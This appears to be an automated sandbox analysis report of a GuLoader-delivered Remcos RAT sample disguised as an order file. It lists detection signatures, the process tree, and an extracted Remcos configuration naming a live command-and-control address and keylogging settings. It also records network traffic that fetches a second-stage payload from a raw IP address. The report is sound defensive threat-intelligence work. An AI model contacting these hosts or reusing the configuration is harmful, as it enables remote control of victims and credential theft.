
Windows Analysis Report
orders_PI 008-01.exe

Overview

General Information

Sample name: orders_PI 008-01.exe
Analysis ID: 1548262
MD5: 5009d8c72623d30ce09149187c66d37c
SHA1: 5c6035f099f16ff4753198e5f631ba410e98227f
SHA256: e38bdd8374c7e1640e8fe34c531228dd9389affb9659cb7c49c00129baa73bdf
Tags: exe, user-lowmal3

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • orders_PI 008-01.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" MD5: 5009D8C72623D30CE09149187C66D37C)
    • orders_PI 008-01.exe (PID: 8112 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" MD5: 5009D8C72623D30CE09149187C66D37C)
      • orders_PI 008-01.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot" MD5: 5009D8C72623D30CE09149187C66D37C)
      • orders_PI 008-01.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo" MD5: 5009D8C72623D30CE09149187C66D37C)
      • orders_PI 008-01.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic" MD5: 5009D8C72623D30CE09149187C66D37C)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["162.251.122.106:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BHLA3T", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1643832066.00000000046DE000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: orders_PI 008-01.exe PID: 8112 | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security

              Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\orders_PI 008-01.exe, ProcessId: 8112, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T09:27:22.500689+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.8 | 49705 | TCP
2024-11-04T09:28:01.311250+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.8 | 49713 | TCP
2024-11-04T09:27:36.768609+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49710 | 162.251.122.106 | 2404 | TCP
2024-11-04T09:27:37.564253+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49711 | 162.251.122.106 | 2404 | TCP
2024-11-04T09:27:37.819920+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 178.237.33.50 | 80 | TCP
2024-11-04T09:27:31.787759+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49709 | 212.162.149.38 | 80 | TCP


              AV Detection

Source: orders_PI 008-01.exe; Avira: detected
Source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["162.251.122.106:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BHLA3T", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: orders_PI 008-01.exe; ReversingLabs: Detection: 13%
Source: Yara match; File source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\orders_PI 008-01.exe; Code function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
Source: orders_PI 008-01.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: orders_PI 008-01.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\orders_PI 008-01.exe; Code function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
Source: C:\Users\user\Desktop\orders_PI 008-01.exe; Code function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
Source: C:\Users\user\Desktop\orders_PI 008-01.exe; Code function: 3_2_344B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,LdrInitializeThunk,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,3_2_344B10F1
Source: C:\Users\user\Desktop\orders_PI 008-01.exe; Code function: 3_2_344B6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,LdrInitializeThunk,3_2_344B6580
Source: C:\Users\user\Desktop\orders_PI 008-01.exe; Code function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
Source: C:\Users\user\Desktop\orders_PI 008-01.exe; Code function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
Source: C:\Users\user\Desktop\orders_PI 008-01.exe; Code function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898

              Networking

Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49710 -> 162.251.122.106:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49711 -> 162.251.122.106:2404
Source: Malware configuration extractor; IPs: 162.251.122.106
Source: global traffic; TCP traffic: 192.168.2.8:49710 -> 162.251.122.106:2404
Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View; IP Address: 178.237.33.50
Source: Joe Sandbox View; ASN Name: UNREAL-SERVERSUS
Source: Network traffic; Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49712 -> 178.237.33.50:80
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 212.162.149.38:80
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49705
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49713
Source: global traffic; HTTP traffic detected: GET /LnGWkyvzVtM166.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: 212.162.149.38 | Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 212.162.149.38
Source: global traffic; HTTP traffic detected: GET /LnGWkyvzVtM166.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: 212.162.149.38 | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: orders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: orders_PI 008-01.exe, 00000005.00000002.1773456088.0000000002258000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: orders_PI 008-01.exe, 00000005.00000002.1773456088.0000000002258000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: orders_PI 008-01.exe; String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: orders_PI 008-01.exe, 00000003.00000002.3907921678.0000000033F20000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: orders_PI 008-01.exe, 00000003.00000002.3907921678.0000000033F20000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic; DNS traffic detected: DNS query: geoplugin.net
Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000003.00000002.3887463700.00000000051F0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://212.162.149.38/LnGWkyvzVtM166.bin
Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://212.162.149.38/LnGWkyvzVtM166.binV
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gp
Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gp#
Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gp:
Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gpI
Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gpV
Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gpeu
Source: orders_PI 008-01.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://ocsp.digicert.com0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://ocspx.digicert.com0E
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv2901.tmp.5.dr; String found in binary or memory: http://www.digicert.com/CPS0~
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.ebuddy.com
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000003.1760994142.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000003.1761352653.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.imvu.com
Source: orders_PI 008-01.exe, 00000007.00000003.1760994142.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000003.1761352653.00000000007CD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.imvu.comata
Source: orders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: orders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.imvu.comr
Source: orders_PI 008-01.exe, 00000005.00000002.1771684606.0000000000193000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: http://www.nirsoft.net
Source: orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.nirsoft.net/
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: bhv2901.tmp.5.dr; String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv2901.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv2901.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: orders_PI 008-01.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv2901.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv2901.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv2901.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-08-30-16/PreSignInSettingsConfig.json
              Source: bhv2901.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=13164f2a9ee6956f1439
              Source: bhv2901.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=b92552
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
